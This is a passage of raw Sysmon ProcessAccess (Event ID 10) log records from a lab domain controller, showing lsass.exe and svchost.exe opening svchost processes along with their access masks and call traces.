C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
